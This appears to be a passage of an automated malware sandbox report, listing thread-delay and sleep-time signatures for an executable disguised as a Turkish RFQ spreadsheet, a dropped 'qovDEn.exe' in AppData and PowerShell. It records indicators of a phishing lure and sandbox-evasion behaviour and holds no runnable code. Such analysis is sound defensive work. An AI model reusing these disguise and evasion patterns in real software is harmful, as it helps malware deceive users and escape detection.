Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Thread delayed: delay time: 594500
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Thread delayed: delay time: 594390

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6542	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 631	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8030	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1348	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Window / User API: threadDelayed 4118	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Window / User API: threadDelayed 5715	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Window / User API: threadDelayed 3112
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Window / User API: threadDelayed 6736

Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe TID: 7120	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5588	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 708	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6200	Thread sleep time: -2767011611056431s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6696	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe TID: 3068	Thread sleep count: 38 > 30	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe TID: 3068	Thread sleep time: -35048813740048126s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe TID: 3068	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe TID: 4784	Thread sleep count: 4118 > 30	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe TID: 3068	Thread sleep time: -599875s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe TID: 4784	Thread sleep count: 5715 > 30	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe TID: 3068	Thread sleep time: -599765s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe TID: 3068	Thread sleep time: -599655s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe TID: 3068	Thread sleep time: -599547s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe TID: 3068	Thread sleep time: -599438s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe TID: 3068	Thread sleep time: -599313s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe TID: 3068	Thread sleep time: -599203s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe TID: 3068	Thread sleep time: -599084s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe TID: 3068	Thread sleep time: -598953s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe TID: 3068	Thread sleep time: -598844s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe TID: 3068	Thread sleep time: -598695s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe TID: 3068	Thread sleep time: -598578s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe TID: 3068	Thread sleep time: -598468s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe TID: 3068	Thread sleep time: -598359s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe TID: 3068	Thread sleep time: -598250s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe TID: 3068	Thread sleep time: -598141s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe TID: 3068	Thread sleep time: -598028s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe TID: 3068	Thread sleep time: -597922s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe TID: 3068	Thread sleep time: -597812s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe TID: 3068	Thread sleep time: -597703s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe TID: 3068	Thread sleep time: -597594s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe TID: 3068	Thread sleep time: -597469s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe TID: 3068	Thread sleep time: -597352s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe TID: 3068	Thread sleep time: -597235s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe TID: 3068	Thread sleep time: -597110s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe TID: 3068	Thread sleep time: -596985s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe TID: 3068	Thread sleep time: -596860s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe TID: 3068	Thread sleep time: -596735s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe TID: 3068	Thread sleep time: -596610s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe TID: 3068	Thread sleep time: -596485s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe TID: 3068	Thread sleep time: -596360s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe TID: 3068	Thread sleep time: -596235s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe TID: 3068	Thread sleep time: -596110s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe TID: 3068	Thread sleep time: -595985s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe TID: 3068	Thread sleep time: -595859s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe TID: 3068	Thread sleep time: -595750s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe TID: 3068	Thread sleep time: -595641s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe TID: 3068	Thread sleep time: -595531s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe TID: 3068	Thread sleep time: -595422s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe TID: 3068	Thread sleep time: -595313s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe TID: 3068	Thread sleep time: -595188s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe TID: 3068	Thread sleep time: -595063s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe TID: 3068	Thread sleep time: -594945s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe TID: 3068	Thread sleep time: -594828s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe TID: 3068	Thread sleep time: -594719s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe TID: 3068	Thread sleep time: -594609s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe TID: 3068	Thread sleep time: -594500s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe TID: 3068	Thread sleep time: -594391s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe TID: 3068	Thread sleep time: -594266s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qovDEn.exe TID: 5124	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qovDEn.exe TID: 1344	Thread sleep count: 32 > 30
Source: C:\Users\user\AppData\Roaming\qovDEn.exe TID: 1344	Thread sleep time: -29514790517935264s >= -30000s
Source: C:\Users\user\AppData\Roaming\qovDEn.exe TID: 1344	Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\AppData\Roaming\qovDEn.exe TID: 7036	Thread sleep count: 3112 > 30
Source: C:\Users\user\AppData\Roaming\qovDEn.exe TID: 1344	Thread sleep time: -599890s >= -30000s
Source: C:\Users\user\AppData\Roaming\qovDEn.exe TID: 7036	Thread sleep count: 6736 > 30
Source: C:\Users\user\AppData\Roaming\qovDEn.exe TID: 1344	Thread sleep time: -599781s >= -30000s
Source: C:\Users\user\AppData\Roaming\qovDEn.exe TID: 1344	Thread sleep time: -599669s >= -30000s
Source: C:\Users\user\AppData\Roaming\qovDEn.exe TID: 1344	Thread sleep time: -599562s >= -30000s
Source: C:\Users\user\AppData\Roaming\qovDEn.exe TID: 1344	Thread sleep time: -599452s >= -30000s
Source: C:\Users\user\AppData\Roaming\qovDEn.exe TID: 1344	Thread sleep time: -599328s >= -30000s
Source: C:\Users\user\AppData\Roaming\qovDEn.exe TID: 1344	Thread sleep time: -599218s >= -30000s
Source: C:\Users\user\AppData\Roaming\qovDEn.exe TID: 1344	Thread sleep time: -599103s >= -30000s
Source: C:\Users\user\AppData\Roaming\qovDEn.exe TID: 1344	Thread sleep time: -598968s >= -30000s
Source: C:\Users\user\AppData\Roaming\qovDEn.exe TID: 1344	Thread sleep time: -598859s >= -30000s
Source: C:\Users\user\AppData\Roaming\qovDEn.exe TID: 1344	Thread sleep time: -598750s >= -30000s
Source: C:\Users\user\AppData\Roaming\qovDEn.exe TID: 1344	Thread sleep time: -598640s >= -30000s
Source: C:\Users\user\AppData\Roaming\qovDEn.exe TID: 1344	Thread sleep time: -598531s >= -30000s
Source: C:\Users\user\AppData\Roaming\qovDEn.exe TID: 1344	Thread sleep time: -598421s >= -30000s
Source: C:\Users\user\AppData\Roaming\qovDEn.exe TID: 1344	Thread sleep time: -598312s >= -30000s
Source: C:\Users\user\AppData\Roaming\qovDEn.exe TID: 1344	Thread sleep time: -598203s >= -30000s
Source: C:\Users\user\AppData\Roaming\qovDEn.exe TID: 1344	Thread sleep time: -598093s >= -30000s
Source: C:\Users\user\AppData\Roaming\qovDEn.exe TID: 1344	Thread sleep time: -597984s >= -30000s
Source: C:\Users\user\AppData\Roaming\qovDEn.exe TID: 1344	Thread sleep time: -597875s >= -30000s
Source: C:\Users\user\AppData\Roaming\qovDEn.exe TID: 1344	Thread sleep time: -597765s >= -30000s
Source: C:\Users\user\AppData\Roaming\qovDEn.exe TID: 1344	Thread sleep time: -597656s >= -30000s
Source: C:\Users\user\AppData\Roaming\qovDEn.exe TID: 1344	Thread sleep time: -597546s >= -30000s
Source: C:\Users\user\AppData\Roaming\qovDEn.exe TID: 1344	Thread sleep time: -597437s >= -30000s
Source: C:\Users\user\AppData\Roaming\qovDEn.exe TID: 1344	Thread sleep time: -597328s >= -30000s
Source: C:\Users\user\AppData\Roaming\qovDEn.exe TID: 1344	Thread sleep time: -597218s >= -30000s
Source: C:\Users\user\AppData\Roaming\qovDEn.exe TID: 1344	Thread sleep time: -597109s >= -30000s
Source: C:\Users\user\AppData\Roaming\qovDEn.exe TID: 1344	Thread sleep time: -597000s >= -30000s
Source: C:\Users\user\AppData\Roaming\qovDEn.exe TID: 1344	Thread sleep time: -596890s >= -30000s
Source: C:\Users\user\AppData\Roaming\qovDEn.exe TID: 1344	Thread sleep time: -596781s >= -30000s
Source: C:\Users\user\AppData\Roaming\qovDEn.exe TID: 1344	Thread sleep time: -596671s >= -30000s
Source: C:\Users\user\AppData\Roaming\qovDEn.exe TID: 1344	Thread sleep time: -596558s >= -30000s
Source: C:\Users\user\AppData\Roaming\qovDEn.exe TID: 1344	Thread sleep time: -596437s >= -30000s
Source: C:\Users\user\AppData\Roaming\qovDEn.exe TID: 1344	Thread sleep time: -596328s >= -30000s
Source: C:\Users\user\AppData\Roaming\qovDEn.exe TID: 1344	Thread sleep time: -596218s >= -30000s
Source: C:\Users\user\AppData\Roaming\qovDEn.exe TID: 1344	Thread sleep time: -596109s >= -30000s
Source: C:\Users\user\AppData\Roaming\qovDEn.exe TID: 1344	Thread sleep time: -595997s >= -30000s
Source: C:\Users\user\AppData\Roaming\qovDEn.exe TID: 1344	Thread sleep time: -595875s >= -30000s
Source: C:\Users\user\AppData\Roaming\qovDEn.exe TID: 1344	Thread sleep time: -595765s >= -30000s
Source: C:\Users\user\AppData\Roaming\qovDEn.exe TID: 1344	Thread sleep time: -595656s >= -30000s
Source: C:\Users\user\AppData\Roaming\qovDEn.exe TID: 1344	Thread sleep time: -595524s >= -30000s
Source: C:\Users\user\AppData\Roaming\qovDEn.exe TID: 1344	Thread sleep time: -595420s >= -30000s
Source: C:\Users\user\AppData\Roaming\qovDEn.exe TID: 1344	Thread sleep time: -595297s >= -30000s
Source: C:\Users\user\AppData\Roaming\qovDEn.exe TID: 1344	Thread sleep time: -595174s >= -30000s
Source: C:\Users\user\AppData\Roaming\qovDEn.exe TID: 1344	Thread sleep time: -595047s >= -30000s
Source: C:\Users\user\AppData\Roaming\qovDEn.exe TID: 1344	Thread sleep time: -594937s >= -30000s
Source: C:\Users\user\AppData\Roaming\qovDEn.exe TID: 1344	Thread sleep time: -594828s >= -30000s
Source: C:\Users\user\AppData\Roaming\qovDEn.exe TID: 1344	Thread sleep time: -594719s >= -30000s
Source: C:\Users\user\AppData\Roaming\qovDEn.exe TID: 1344	Thread sleep time: -594609s >= -30000s
Source: C:\Users\user\AppData\Roaming\qovDEn.exe TID: 1344	Thread sleep time: -594500s >= -30000s
Source: C:\Users\user\AppData\Roaming\qovDEn.exe TID: 1344	Thread sleep time: -594390s >= -30000s

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Thread delayed: delay time: 599765	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Thread delayed: delay time: 599655	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Thread delayed: delay time: 599438	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Thread delayed: delay time: 599313	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Thread delayed: delay time: 599203	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Thread delayed: delay time: 599084	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Thread delayed: delay time: 598953	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Thread delayed: delay time: 598844	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Thread delayed: delay time: 598695	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Thread delayed: delay time: 598578	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Thread delayed: delay time: 598468	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Thread delayed: delay time: 598359	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Thread delayed: delay time: 598250	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Thread delayed: delay time: 598141	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Thread delayed: delay time: 598028	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Thread delayed: delay time: 597922	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Thread delayed: delay time: 597812	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Thread delayed: delay time: 597703	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Thread delayed: delay time: 597594	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Thread delayed: delay time: 597469	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Thread delayed: delay time: 597352	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Thread delayed: delay time: 597235	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Thread delayed: delay time: 597110	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Thread delayed: delay time: 596985	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Thread delayed: delay time: 596860	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Thread delayed: delay time: 596735	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Thread delayed: delay time: 596610	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Thread delayed: delay time: 596485	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Thread delayed: delay time: 596360	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Thread delayed: delay time: 596235	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Thread delayed: delay time: 596110	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Thread delayed: delay time: 595985	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Thread delayed: delay time: 595859	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Thread delayed: delay time: 595750	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Thread delayed: delay time: 595641	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Thread delayed: delay time: 595531	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Thread delayed: delay time: 595422	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Thread delayed: delay time: 595313	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Thread delayed: delay time: 595188	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Thread delayed: delay time: 595063	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Thread delayed: delay time: 594945	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Thread delayed: delay time: 594828	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Thread delayed: delay time: 594719	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Thread delayed: delay time: 594609	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Thread delayed: delay time: 594500	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Thread delayed: delay time: 594391	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Thread delayed: delay time: 594266	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Thread delayed: delay time: 599890
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Thread delayed: delay time: 599781
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Thread delayed: delay time: 599669
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Thread delayed: delay time: 599562
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Thread delayed: delay time: 599452
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Thread delayed: delay time: 599328
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Thread delayed: delay time: 599218
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Thread delayed: delay time: 599103
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Thread delayed: delay time: 598968
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Thread delayed: delay time: 598859
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Thread delayed: delay time: 598750
